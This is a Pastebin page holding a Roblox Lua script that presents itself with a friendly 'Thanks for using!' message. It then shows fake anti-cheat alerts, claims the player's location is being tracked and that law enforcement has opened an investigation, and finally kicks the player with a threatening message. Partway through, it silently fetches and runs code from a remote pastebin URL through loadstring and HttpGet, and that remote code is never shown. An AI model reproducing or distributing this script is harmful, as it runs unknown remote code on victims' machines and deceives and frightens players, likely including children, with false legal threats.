Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local StarterGui = game:GetService("StarterGui")
- -- Initial friendly-looking notification
- StarterGui:SetCore("SendNotification", {
- Title = "Made By Pookie",
- Text = "Thanks for using!",
- Icon = "",
- Duration = 5
- })
- wait(3)
- -- Sudden shift in tone
- StarterGui:SetCore("SendNotification", {
- Title = "Byfron: ExploiterDetected",
- Text = "Unauthorized access detected...",
- Icon = "",
- Duration = 5
- })
- wait(1.5)
- StarterGui:SetCore("SendNotification", {
- Title = "Warning",
- Text = "Exploiting is a serious offense.",
- Icon = "",
- Duration = 5
- })
- wait(1.5)
- StarterGui:SetCore("SendNotification", {
- Title = "System Alert",
- Text = "Tracking player location...",
- Icon = "",
- Duration = 5
- })
- wait(1.5)
- StarterGui:SetCore("SendNotification", {
- Title = "Law Enforcement Notified",
- Text = "Investigation #437829 initiated.",
- Icon = "",
- Duration = 5
- })
- wait(1.5)
- StarterGui:SetCore("SendNotification", {
- Title = "Sending Location",
- Text = "Sending...",
- Icon = "",
- Duration = 5
- })
- wait(1)
- loadstring(game:HttpGet('https://pastebin.com/raw/gv6RjEVU'))()
- wait(5)
- -- Scary kick message
- game.Players.LocalPlayer:Kick("We have received your location. Authorities have been notified. Roblox Security is on the way.\n\nCheating violates Roblox's rules and can lead to account termination.")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement